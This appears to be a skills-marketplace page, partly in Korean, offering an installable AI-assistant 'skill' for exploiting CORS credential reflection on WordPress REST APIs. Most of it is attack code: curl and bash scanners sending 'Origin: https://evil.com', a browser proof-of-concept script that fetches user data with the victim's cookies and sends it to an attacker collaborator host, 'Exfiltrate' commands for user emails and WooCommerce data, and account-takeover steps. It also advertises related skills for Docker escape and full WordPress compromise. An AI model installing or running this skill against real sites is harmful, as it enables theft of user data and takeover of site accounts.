원클릭으로
cors-credential-wordpress
Exploit WP CORS credential reflection for data theft.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Exploit WP CORS credential reflection for data theft.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | cors-credential-wordpress |
| description | Exploit WP CORS credential reflection for data theft. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei |
| metadata | {"tags":["recon","cors","wordpress","credential-theft","ATO"],"category":"recon","related_skills":["wp-mass-recon","xmlrpc-exploitation","cross-attack-chains","wordpress-full-compromise"]} |
Detect, confirm, and exploit CORS credential reflection on WordPress REST API endpoints. CORS misconfiguration is one of the most common critical findings in US SMB WordPress sites (~7-8% of all WP targets), enabling cross-origin data exfiltration with victim cookies. Documents 8 CORS variants and full browser PoC construction.
wp-mass-recon flags a target with Access-Control-Allow-Credentials: true.terminal tool with curl and python3.web_extract or browser_navigate for browser PoC verification./wp-json/wp/v2/).# Quick detection
curl -skI "https://TARGET/wp-json/wp/v2/users" -H "Origin: https://evil.com" | grep -iE "access-control"
# Full CORS matrix (10 endpoints)
for ep in "users" "posts" "pages" "media" "comments" "categories" "tags" "settings" "plugins" "themes"; do
echo "=== /wp-json/wp/v2/$ep ==="
curl -skI "https://TARGET/wp-json/wp/v2/$ep" -H "Origin: https://evil.com" | grep -iE "access-control|http/"
echo ""
done
| Variant | Detection | Exploitability |
|---|---|---|
| Origin reflection + creds | Access-Control-Allow-Credentials: true + mirror Origin | Critical — full data theft |
| Null origin | Access-Control-Allow-Origin: null | High — sandboxed iframes |
| Wildcard no creds | Access-Control-Allow-Origin: * (no creds) | Info — public data only |
| Credentialed preflight | OPTIONS returns 200 + ACAC | High — if GET without preflight |
| Auth-only leak | CORS only on auth-protected endpoints | High — cookie theft |
| Multi-origin | Multiple origins reflected | Critical — broader attack surface |
| Plugin-specific CORS | CORS only on plugin namespace | Medium — plugin data |
| Staging-only CORS | Production has no CORS, staging does | Medium — dependent on staging access |
curl -skI "https://TARGET/wp-json/wp/v2/users" \
-H "Origin: https://evil.com" \
-H "User-Agent: Mozilla/5.0" 2>&1
Positive signals:
Access-Control-Allow-Origin: https://evil.com (mirrors attacker origin)Access-Control-Allow-Credentials: true (sends cookies cross-origin)Access-Control-Allow-Methods: GET (data exfiltration vector)#!/bin/bash
TARGET="$1"
ENDPOINTS=(
"wp/v2/users"
"wp/v2/posts"
"wp/v2/pages"
"wp/v2/media"
"wp/v2/comments"
"wp/v2/categories"
"wp/v2/tags"
"wc/v3/products"
"wc/v3/orders"
"gf/v2/forms"
"elementor/v1/globals"
"revslider/v1/slides"
)
for ep in "${ENDPOINTS[@]}"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 10 "https://$TARGET/wp-json/$ep")
if [[ "$code" == "200" ]]; then
cors=$(curl -skI --max-time 10 "https://$TARGET/wp-json/$ep" -H "Origin: https://evil.com" 2>/dev/null | grep -i "access-control-allow-credentials: true")
if [[ -n "$cors" ]]; then
echo "[CRITICAL] CORS ON: /wp-json/$ep — data accessible cross-origin"
fi
fi
done
<script>
fetch("https://TARGET/wp-json/wp/v2/users", {
credentials: "include",
headers: { "Origin": "https://evil.com" }
})
.then(r => r.json())
.then(data => {
fetch("https://YOUR_COLLABORATOR/log?d=" + btoa(JSON.stringify(data)));
});
</script>
# Exfiltrate users with emails
curl -sk "https://TARGET/wp-json/wp/v2/users?context=edit" \
-H "Origin: https://evil.com" | python3 -m json.tool | grep -E '"id"|"name"|"slug"|"email"|"roles"'
# Exfiltrate all posts
curl -sk "https://TARGET/wp-json/wp/v2/posts?per_page=100" \
-H "Origin: https://evil.com" | python3 -c "
import sys, json
posts = json.load(sys.stdin)
for p in posts:
print(f\"{p['id']}: {p['title']['rendered']}\")
" 2>/dev/null
# Exfiltrate WooCommerce products
curl -sk "https://TARGET/wp-json/wc/v3/products" \
-H "Origin: https://evil.com" | python3 -m json.tool 2>/dev/null | head -50
admin@target.com)credentials: "include" sends WP auth cookie/wp-admin/ as victimSameSite=Lax or SameSite=Strict cookies won't send cross-origin even with CORS. Check cookie attributes in browser.Origin header or block cross-origin requests. Test from non-Cloudflare IP.Access-Control-Allow-Origin: * without credentials — this is public data, not a vulnerability. The key is Access-Control-Allow-Credentials: true.Access-Control-Allow-Credentials: true AND an Access-Control-Allow-Origin that matches the attacker's origin (not *).